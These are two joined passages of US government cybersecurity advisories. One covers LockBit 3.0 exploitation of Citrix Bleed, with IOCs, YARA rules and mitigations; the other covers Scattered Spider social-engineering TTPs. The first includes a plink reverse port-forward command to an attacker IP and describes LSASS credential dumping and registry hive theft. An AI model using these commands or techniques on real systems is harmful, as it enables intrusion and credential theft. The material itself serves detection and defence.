c:\perflogs\64-bit\netscan.exe Softperfect netscan Filename tniwinagent.exe Total network inventory agent Filename psexec.exe Psexec used to deploy screenconnect Filename 7z.exe Used to compress files Tool Action1 RMM Tool Atera RMM tool anydesk rmm tool fixme it rmm tool screenconnect rmm tool splashtop rmm tool zoho assist rmm ipv4 101.97.36[.]61 zoho assist ipv4 168.100.9[.]137 ssh portforwarding infra ipv4 185.20.209[.]127 zoho assist ipv4 185.230.212[.]83 zoho assist ipv4 206.188.197[.]22 powershell reverse shell seen in powershell logging ipv4 54.84.248[.]205 fixme ip Ipv4 141.98.9[.]137 Remote IP for CitrixBleed domain assist.zoho.eu zoho assist filename c:\perflogs\1.exe connectwise renamed filename c:\perflogs\run.exe screenconnect pushed by psexec filename c:\perflogs\64-bit\m.exe connectwise renamed filename c:\perflogs\64-bit\m0.exe connectwise renamed filename c:\perflogs\za_access_my_department.exe zoho remote assist filename c:\users\\music\za_access_my_department.exe zoho remote assist filename c:\windows\servicehost.exe plink renamed filename c:\windows\sysconf.bat runs servicehost.exe (plink) command filename c:\windows\temp\screenconnect\23.8.5.8707\files\azure.msi zoho remote assist used to transfer data via screenconnect cmdline echo enter | c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 @168.100.9[.]137 -pw plink port forwarding domain eu1-dms.zoho[.]eu zoho assist domain fixme[.]it fixme it domain unattended.techinline[.]net fixme it MITRE ATT&CK TACTICS AND TECHNIQUES See Table 6 and Table 7 for all referenced threat actor tactics and techniques in this advisory. Table 6: ATT&CK Techniques for Enterprise: Discovery Technique Title ID Use System Information Discovery T1082 Threat actors will attempt to obtain information about the operating system and hardware, including versions, and patches. Table 7: ATT&CK Techniques for Enterprise: Credential Access Technique Title ID Use Modify Authentication Process: Multifactor Authentication T1556.006 Threat actors leverage vulnerabilities found within CVE- to compromise, modify, and/or bypass multifactor authentication to hijack user sessions, harvest credentials, and move laterally, which enables persistent access. Steal Web Session Cookie T1539 Threat actors with access to valid cookies can establish an authenticated session within the NetScaler appliance without a username, password, or access to multifactor authentication (MFA) tokens. DETECTION METHODS Hunting Guidance Network defenders should prioritize observing users in session when hunting for network anomalies. This will aid the hunt for suspicious activity such as installing tools on the system (e.g., putty, rClone ), new account creation, log item failure, or running commands such as hostname, quser, whoami, net, and taskkill. Rotating credentials for identities provisioned for accessing resources via a vulnerable NetScaler ADC or Gateway appliance can also aid in detection. For IP addresses: Identify if NetScaler logs the change in IP. Identify if users are logging in from geolocations uncommon for your organization’s user base. If logging VPN authentication, identify if users are associated with two or more public IP addresses while in a different subnet or geographically dispersed. Note: MFA to NetScaler will not operate as intended due to the attacker bypassing authentication by providing a token/session for an already authenticated user. The following procedures can help identify potential exploitation of CVE-2023-4966 and LockBit 3.0 activity: Search for filenames that contain tf0gYx2YI for identifying LockBit encrypted files. LockBit 3.0 actors were seen using the C:\Temp directory for loading and the execution of files. Investigate requests to the HTTP/S endpoint from WAF. Hunt for suspicious login patterns from NetScaler logs Hunt for suspicious virtual desktop agent Windows Registry keys Analyze memory core dump files. Below, are CISA developed YARA rules and an open-source rule that may be used to detect malicious activity in the Citrix NetScaler ADC and Gateway software environment. For more information on detecting suspicious activity within NetScaler logs or additional resources, visit CISA’s Malware Analysis Report (MAR) MAR-10478915-1.v1 Citrix Bleed or the resource section of this CSA [3]: YARA Rules CISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority Subsystem Service (LSASS) process memory to disk, and attempt to establish sessions via Windows Remote Management (WinRM). The files include: Windows Batch file (.bat) Windows Executable (.exe) Windows Dynamic Link Library (.dll) Python Script (.py) rule CISA_10478915_01 : trojan installs_other_components { meta: author = "CISA Code & Media Analysis" incident = "10478915" date = "2023-11-06" last_modified = "20231108_1500" actor = "n/a" family = "n/a" capabilities = "installs-other-components" malware_Type = "trojan" tool_type = "information-gathering" description = "Detects trojan .bat samples" sha256 = "98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9" strings: $s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 } $s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 65 6d } $s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 } condition: all of them } This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument. The output is printed to a file named 'z.txt' located in the path C:\Windows\Tasks. Next, a.bat pings the loop back internet protocol (IP) address 127.0.0[.]1 three times. The next command it runs is reg save to save the HKLM\SYSTEM registry hive into the C:\Windows\tasks\em directory. Again, a.bat pings the loop back address 127.0.0[.]1 one time before executing another reg save command and saves the HKLM\SAM registry hive into the C:\Windows\Task\am directory. Next, a.bat runs three makecab commands to create three cabinet (.cab) files from the previously mentioned saved registry hives and one file named C:\Users\Public\a.png. The names of the .cab files are as follows: c:\windows\tasks\em.cab c:\windows\tasks\am.cab c:\windows\tasks\a.cab rule CISA_10478915_02 : trojan installs_other_components { meta: author = "CISA Code & Media Analysis" incident = "10478915" date = "2023-11-06" last_modified = "20231108_1500" actor = "n/a" family = "n/a" capabilities = "installs-other-components" malware_type = "trojan" tool_type = "unknown" description = "Detects trojan PE32 samples" sha256 = "e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068" strings: $s1 = { 57 72 69 74 65 46 69 6c 65 } $s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 } $s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 } $s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 } $s5 = { 64 65 6c 65 74 65 5b 5d } $s6 = { 4e 41 4e 28 49 4e 44 29 } condition: uint16(0) == 0x5a4d and pe.imphash() == "6e8ca501c45a9b85fff2378cffaa24b2" and pe.size_of_code == 84480 and all of them } This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. This file issues the remote procedure call (RPC) ncalrpc:[lsasspirpc] to the RPC end point to provide a file path to the LSASS on the infected machine. Once the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. If the DLL is correctly loaded, then the malware outputs the message "[*]success" in the console. rule CISA_10478915_03 : trojan steals_authentication_credentials credential_exploitation { meta: author = "CISA Code & Media Analysis" incident = "10478915" date = "2023-11-06" last_modified = "20231108_1500" actor = "n/a" family = "n/a" capabilities = "steals-authentication-credentials" malware_type = "trojan" tool_type = "credential-exploitation" description = "Detects trojan DLL samples" sha256 = "17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994" strings: $s1 = { 64 65 6c 65 74 65 } $s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e } $s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 } $s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 } $s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 } $s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 } condition: uint16(0) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_WINDOWS_CUI and pe.size_of_code == 56832 and all of them } This file is a 64-bit Windows DLL called a.dll that is executed by a.bat as a parameter for the file a.exe. The file a.exe loads this file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to create a file called a.png in the path C:\Users\Public. Next, a.dll loads DbgCore.dll then utilizes MiniDumpWriteDump function to dump LSASS process memory to disk. If successful, the dumped process memory is written to a.png. Once this is complete, the file a.bat specifies that the file a.png is used to create the cabinet file called a.cab in the path C:\Windows\Tasks. rule CISA_10478915_04 : backdoor communicates_with_c2 remote_access { meta: author = "CISA Code & Media Analysis" incident = "10478915" date = "2023-11-06" last_modified = "20231108_1500" actor = "n/a" family = "n/a" capabilities = "communicates-with-c2" malware_type = "backdoor" tool_type = "remote-access" description = "Detects trojan python samples" sha256 = "906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6" strings: $s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 } $s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a } $s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 } $s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 } condition: all of them } This file is a Python script called a.py that attempts to leverage WinRM to establish a session. The script attempts to authenticate to the remote machine using NT LAN Manager (NTLM) if the keyword "hashpasswd" is present. If the keyword "hashpasswd" is not present, then the script attempts to authenticate using basic authentication. Once a WinRM session is established with the remote machine, the script has the ability to execute command line arguments on the remote machine. If there is no command specified, then a default command of “whoami” is run. Open Source YARA Rule Import "pe"  rule M_Hunting_Backdoor_FREEFIRE  { meta: author = "Mandiant"  description = "This is a hunting rule to detect FREEFIRE samples using OP code sequences in getLastRecord method"  md5 = "eb842a9509dece779d138d2e6b0f6949"  malware_family = "FREEFIRE"  strings: $s1 = { 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? ??  }  condition:  uint16(0) == 0x5A4D  and filesize >= 5KB  and pe.imports("mscoree.dll")  and all of them } INCIDENT RESPONSE Organizations are encouraged to assess Citrix software and your systems for evidence of compromise, and to hunt for malicious activity (see Additional Resources section).If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the web management software as well as installing malicious code. If a potential compromise is detected, organizations should: Quarantine or take offline potentially affected hosts. Reimage compromised hosts. Create new account credentials. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections. Note: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms. Report the compromise to FBI Internet Crime Complaint Center (IC3) at IC3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government (SLTT) entities can also report to MS-ISAC (SOC@cisecurity.org or 866-787-4722). If outside of the US, please contact your national cyber center. MITIGATIONS These mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and Gateway software. CISA and authoring organizations recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of exploitation such as threat actors leveraging unpatched vulnerabilities within Citrix NetScaler appliances, which strengthens the security posture of their customers. For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide. The authoring organizations of this CSA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise associated with Citrix CVE 2023-4966 and LockBit 3.0 ransomware & ransomware affiliates. These mitigations align with the Cross-Sector Cybersecurity performance goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Isolate NetScaler ADC and Gateway appliances for testing until patching is ready and deployable. Secure remote access tools by: Implement application controls to manage and control the execution of software, including allowlisting remote access programs. Application controls should prevent the installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation. Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]: Audit the network for systems using RDP. Close unused RDP ports. Enforce account lockouts after a specified number of attempts. Apply phishing-resistant multifactor authentication (MFA). Log RDP login attempts. Restrict the use of PowerShell, using Group Policy, and only grant access to specific users on a case-by-case basis. Typically, only those users or administrators who manage the network or Windows operating systems (OSs) should be permitted to use PowerShell [CPG 2.E]. Update Windows PowerShell or PowerShell Core to the latest version and uninstall all earlier PowerShell versions. Logs from Windows PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities [CPG 1.E, 2.S, 2.T]. Enable enhanced PowerShell logging [CPG 2.T, 2.U]. PowerShell logs contain valuable data, including historical OS and registry interaction and possible TTPs of a threat actor’s PowerShell use. Ensure PowerShell instances, using the latest version, have module, script block, and transcription logging enabled (enhanced logging). The two logs that record PowerShell activity are the PowerShell Windows Event Log and the PowerShell Operational Log. FBI and CISA recommend turning on these two Windows Event Logs with a retention period of at least 180 days. These logs should be checked on a regular basis to confirm whether the log data has been deleted or logging has been turned off. Set the storage size permitted for both logs to as large as possible. Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations requiring administrator privileges to reduce the risk of lateral movement by PsExec. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, or the cloud). Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST's standards for developing and managing password policies. Use longer passwords consisting of at least 15 characters [CPG 2.B]. Store passwords in hashed format using industry-recognized password managers. Add password user “salts” to shared login credentials. Avoid reusing passwords [CPG 2.C]. Implement multiple failed login attempt account lockouts [CPG 2.G]. Disable password “hints." Require administrator credentials to install software. Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E]. Upgrade vulnerable NetScaler ADC and Gateway appliances to the latest version available to lower the risk of compromise. VALIDATE SECURITY CONTROLS In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 1). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. CISA and the authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. RESOURCES Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts. The Joint Ransomware Guide provides preparation, prevention, and mitigation best practices as well as a ransomware response checklist. Cyber Hygiene Services and Ransomware Readiness Assessment provide no-cost cyber hygiene and ransomware readiness assessment services. For more resources to help aid in the mitigation of cyber threats and ransomware attacks visit Strategies to Mitigate Cyber Security Incidents, Protect yourself from Ransomware, and How the ASD’s ACSC can help during a Cyber Security Incident. REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at report@cisa.gov or (888) 282-0870. Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASD’s ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au. DISCLAIMER The information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring organizations. ACKNOWLEDGEMENTS Boeing contributed to this CSA. REFERENCES [1] NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966 [2] What is Mshta, How Can it Be Used and How to Protect Against it (McAfee) [3] Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability (CVE-2023-4966)   VERSION HISTORY November 21, 2023: Initial version.    

SUMMARY The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to recent activity by Scattered Spider threat actors against the commercial facilities sectors and subsectors. This advisory provides tactics, techniques, and procedures (TTPs) obtained through FBI investigations as recently as November 2023. Scattered Spider is a cybercriminal group that targets large companies and their contracted information technology (IT) help desks. Scattered Spider threat actors, per trusted third parties, have typically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware alongside their usual TTPs. The FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of a cyberattack by Scattered Spider actors. Download the PDF version of this report: AA23-320A Scattered Spider (PDF, 510.78 KB ) TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK® Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Overview Scattered Spider (also known as Starfraud, UNC3944, Scatter Swine, and Muddled Libra) engages in data extortion and several other criminal activities.[1] Scattered Spider threat actors are considered experts in social engineering and use multiple social engineering techniques, especially phishing, push bombing, and subscriber identity module (SIM) swap attacks, to obtain credentials, install remote access tools, and/or bypass multi-factor authentication (MFA). According to public reporting, Scattered Spider threat actors have [2],[3],[4]: Posed as company IT and/or helpdesk staff using phone calls or SMS messages to obtain credentials from employees and gain access to the network [T1598],[T1656]. Posed as company IT and/or helpdesk staff to direct employees to run commercial remote access tools enabling initial access [T1204],[T1219],[T1566]. Posed as IT staff to convince employees to share their one-time password (OTP), an MFA authentication code. Sent repeated MFA notification prompts leading to employees pressing the “Accept” button (also known as MFA fatigue) [T1621].[5] Convinced cellular carriers to transfer control of a targeted user’s phone number to a SIM card they controlled, gaining control over the phone and access to MFA prompts. Monetized access to victim networks in numerous ways including extortion enabled by ransomware and data theft [T1657]. After gaining access to networks, the FBI observed Scattered Spider threat actors using publicly available, legitimate remote access tunneling tools. Table 1 details a list of legitimate tools Scattered Spider, repurposed and used for their criminal activity. Note: The use of these legitimate tools alone is not indicative of criminal activity. Users should review the Scattered Spider indicators of compromise (IOCs) and TTPs discussed in this CSA to determine whether they have been compromised. Table 1: Legitimate Tools Used by Scattered Spider Tool Intended Use Fleetdeck.io Enables remote monitoring and management of systems. Level.io Enables remote monitoring and management of systems. Mimikatz [S0002] Extracts credentials from a system. Ngrok [S0508] Enables remote access to a local web server by tunneling over the internet. Pulseway Enables remote monitoring and management of systems. Screenconnect Enables remote connections to network devices for management. Splashtop Enables remote connections to network devices for management. Tactical.RMM Enables remote monitoring and management of systems. Tailscale Provides virtual private networks (VPNs) to secure network communications. Teamviewer Enables remote connections to network devices for management. In addition to using legitimate tools, Scattered Spider also uses malware as part of its TTPs. See Table 2 for some of the malware used by Scattered Spider. Table 2: Malware Used by Scattered Spider Malware Use AveMaria (also known as WarZone [S0670]) Enables remote access to a victim’s systems. Raccoon Stealer Steals information including login credentials [TA0006], browser history [T1217], cookies [T1539], and other data. VIDAR Stealer Steals information including login credentials, browser history, cookies, and other data. Scattered Spider threat actors have historically evaded detection on target networks by using living off the land techniques and allowlisted applications to navigate victim networks, as well as frequently modifying their TTPs. Observably, Scattered Spider threat actors have exfiltrated data [TA0010] after gaining access and threatened to release it without deploying ransomware; this includes exfiltration to multiple sites including U.S.-based data centers and MEGA[.]NZ [T1567.002]. Recent Scattered Spider TTPs New TTP - File Encryption More recently, the FBI has identified Scattered Spider threat actors now encrypting victim files after exfiltration [T1486]. After exfiltrating and/or encrypting data, Scattered Spider threat actors communicate with victims via TOR, Tox, email, or encrypted applications. Reconnaissance, Resource Development, and Initial Access Scattered Spider intrusions often begin with broad phishing [T1566] and smishing [T1660] attempts against a target using victim-specific crafted domains, such as the domains listed in Table 3 [T1583.001]. Table 3: Domains Used by Scattered Spider Threat Actors Domains victimname-sso[.]com victimname-servicedesk[.]com victimname-okta[.]com In most instances, Scattered Spider threat actors conduct SIM swapping attacks against users that respond to the phishing/smishing attempt. The threat actors then work to identify the personally identifiable information (PII) of the most valuable users that succumbed to the phishing/smishing, obtaining answers for those users’ security questions. After identifying usernames, passwords, PII [T1589], and conducting SIM swaps, the threat actors then use social engineering techniques [T1656] to convince IT help desk personnel to reset passwords and/or MFA tokens [T1078.002],[T1199],[T1566.004] to perform account takeovers against the users in single sign-on (SSO) environments. Execution, Persistence, and Privilege Escalation Scattered Spider threat actors then register their own MFA tokens [T1556.006],[T1606] after compromising a user’s account to establish persistence [TA0003]. Further, the threat actors add a federated identity provider to the victim’s SSO tenant and activate automatic account linking [T1484.002]. The threat actors are then able to sign into any account by using a matching SSO account attribute. At this stage, the Scattered Spider threat actors already control the identity provider and then can choose an arbitrary value for this account attribute. As a result, this activity allows the threat actors to perform privileged escalation [TA0004] and continue logging in even when passwords are changed [T1078]. Additionally, they leverage common endpoint detection and response (EDR) tools installed on the victim networks to take advantage of the tools’ remote-shell capabilities and executing of commands which elevates their access. They also deploy remote monitoring and management (RMM) tools [T1219] to then maintain persistence. Discovery, Lateral Movement, and Exfiltration Once persistence is established on a target network, Scattered Spider threat actors often perform discovery, specifically searching for SharePoint sites [T1213.002], credential storage documentation [T1552.001], VMware vCenter infrastructure [T1018], backups, and instructions for setting up/logging into Virtual Private Networks (VPN) [TA0007]. The threat actors enumerate the victim’s Active Directory (AD), perform discovery and exfiltration of victim’s code repositories [T1213.003], code-signing certificates [T1552.004], and source code [T1083],[TA0010]. Threat actors activate Amazon Web Services (AWS) Systems Manager Inventory [T1538] to discover targets for lateral movement [TA0007],[TA0008], then move to both preexisting [T1021.007] and actor-created [T1578.002] Amazon Elastic Compute Cloud (EC2) instances. In instances where the ultimate goal is data exfiltration, Scattered Spider threat actors use actor-installed extract, transform, and load (ETL) tools [T1648] to bring data from multiple data sources into a centralized database [T1074],[T1530]. According to trusted third parties, where more recent incidents are concerned, Scattered Spider threat actors may have deployed BlackCat/ALPHV ransomware onto victim networks—thereby encrypting VMware Elastic Sky X integrated (ESXi) servers [T1486]. To determine if their activities have been uncovered and maintain persistence, Scattered Spider threat actors often search the victim’s Slack, Microsoft Teams, and Microsoft Exchange online for emails [T1114] or conversations regarding the threat actor’s intrusion and any security response. The threat actors frequently join incident remediation and response calls and teleconferences, likely to identify how security teams are hunting them and proactively develop new avenues of intrusion in response to victim defenses. This is sometimes achieved by creating new identities in the environment [T1136] and is often upheld with fake social media profiles [T1585.001] to backstop newly created identities. MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 4 through 17 for all referenced threat actor tactics and techniques in this advisory. Table 4: Reconnaissance Technique Title ID Use Gather Victim Identity Information T1589 Scattered Spider threat actors gather usernames, passwords, and PII for targeted organizations. Phishing for Information T1598 Scattered Spider threat actors use phishing to obtain login credentials, gaining access to a victim’s network. Table 5: Resource Development Technique Title ID Use Acquire Infrastructure: Domains T1583.001 Scattered Spider threat actors create domains for use in phishing and smishing attempts against targeted organizations. Establish Accounts: Social Media Accounts T1585.001 Scattered Spider threat actors create fake social media profiles to backstop newly created user accounts in a targeted organization. Table 6: Initial Access Technique Title ID Use Phishing T1566 Scattered Spider threat actors use broad phishing attempts against a target to obtain information used to gain initial access. Scattered Spider threat actors have posed as helpdesk personnel to direct employees to install commercial remote access tools. Phishing (Mobile) T1660 Scattered Spider threat actors send SMS messages, known as smishing, when targeting a victim. Phishing: Spearphishing Voice T1566.004 Scattered Spider threat actors use voice communications to convince IT help desk personnel to reset passwords and/or MFA tokens. Trusted Relationship T1199 Scattered Spider threat actors abuse trusted relationships of contracted IT help desks to gain access to targeted organizations. Valid Accounts: Domain Accounts T1078.002 Scattered Spider threat actors obtain access to valid domain accounts to gain initial access to a targeted organization. Table 7: Execution Technique Title ID Use Serverless Execution T1648 Scattered Spider threat actors use ETL tools to collect data in cloud environments. User Execution T1204 Scattered Spider threat actors impersonating helpdesk personnel direct employees to run commercial remote access tools thereby enabling access to the victim’s network. Table 8: Persistence Technique Title ID Use Persistence TA0003 Scattered Spider threat actors seek to maintain persistence on a targeted organization’s network. Create Account T1136 Scattered Spider threat actors create new user identities in the targeted organization. Modify Authentication Process: Multi-Factor Authentication T1556.006 Scattered Spider threat actors may modify MFA tokens to gain access to a victim’s network. Valid Accounts T1078 Scattered Spider threat actors abuse and control valid accounts to maintain network access even when passwords are changed. Table 9: Privilege Escalation Technique Title ID Use Privilege Escalation TA0004 Scattered Spider threat actors escalate account privileges when on a targeted organization’s network. Domain Policy Modification: Domain Trust Modification T1484.002 Scattered Spider threat actors add a federated identify provider to the victim’s SSO tenant and activate automatic account linking. Table 10: Defense Evasion Technique Title ID Use Modify Cloud Compute Infrastructure: Create Cloud Instance T1578.002 Scattered Spider threat actors will create cloud instances for use during lateral movement and data collection. Impersonation TA1656 Scattered Spider threat actors pose as company IT and/or helpdesk staff to gain access to victim’s networks. Scattered Spider threat actors use social engineering to convince IT help desk personnel to reset passwords and/or MFA tokens. Table 11: Credential Access Technique Title ID Use Credential Access TA0006 Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain login credentials. Forge Web Credentials T1606 Scattered Spider threat actors may forge MFA tokens to gain access to a victim’s network. Multi-Factor Authentication Request Generation T1621 Scattered Spider sends repeated MFA notification prompts to lead employees to accept the prompt and gain access to the target network. Unsecured Credentials: Credentials in Files T1552.001 Scattered Spider threat actors search for insecurely stored credentials on victim’s systems. Unsecured Credentials: Private Keys T1552.004 Scattered Spider threat actors search for insecurely stored private keys on victim’s systems. Table 12: Discovery Technique Title ID Use Discovery TA0007 Upon gaining access to a targeted network, Scattered Spider threat actors seek out SharePoint sites, credential storage documentation, VMware vCenter, infrastructure backups and enumerate AD to identify useful information to support further operations. Browser Information Discovery T1217 Scattered Spider threat actors use tools (e.g., Raccoon Stealer) to obtain browser histories. Cloud Service Dashboard T1538 Scattered Spider threat actors leverage AWS Systems Manager Inventory to discover targets for lateral movement. File and Directory Discovery T1083 Scattered Spider threat actors search a compromised network to discover files and directories for further information or exploitation. Remote System Discovery T1018 Scattered Spider threat actors search for infrastructure, such as remote systems, to exploit. Steal Web Session Cookie T1539 Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain browser cookies. Table 13: Lateral Movement Technique Title ID Use Lateral Movement TA0008 Scattered Spider threat actors laterally move across a target network upon gaining access and establishing persistence. Remote Services: Cloud Services T1021.007 Scattered Spider threat actors use pre-existing cloud instances for lateral movement and data collection. Table 14: Collection Technique Title ID Use Data from Information Repositories: Code Repositories T1213.003 Scattered Spider threat actors search code repositories for data collection and exfiltration. Data from Information Repositories: Sharepoint T1213.002 Scattered Spider threat actors search SharePoint repositories for information. Data Staged T1074 Scattered Spider threat actors stage data from multiple data sources into a centralized database before exfiltration. Email Collection T1114 Scattered Spider threat actors search victim’s emails to determine if the victim has detected the intrusion and initiated any security response. Data from Cloud Storage T1530 Scattered Spider threat actors search data in cloud storage for collection and exfiltration. Table 15: Command and Control Technique Title ID Use Remote Access Software T1219 Impersonating helpdesk personnel, Scattered Spider threat actors direct employees to run commercial remote access tools thereby enabling access to and command and control of the victim’s network. Scattered Spider threat actors leverage third-party software to facilitate lateral movement and maintain persistence on a target organization’s network. Table 16: Exfiltration Technique Title ID Use Exfiltration TA0010 Scattered Spider threat actors exfiltrate data from a target network to for data extortion. Table 17: Impact Technique Title ID Use Data Encrypted for Impact T1486 Scattered Spider threat actors recently began encrypting data on a target network and demanding a ransom for decryption. Scattered Spider threat actors has been observed encrypting VMware ESXi servers. Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Scattered Spider threat actors exfiltrate data to multiple sites including U.S.-based data centers and MEGA[.]NZ. Financial Theft T1657 Scattered Spider threat actors monetized access to victim networks in numerous ways including extortion-enabled ransomware and data theft. MITIGATIONS These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques, thus, strengthening the secure posture for their customers. For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide. The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actor activity and to reduce the risk of compromise by Scattered Spider threat actors. These mitigations align with the Cross-Sector Cybersecurity Performance Goals 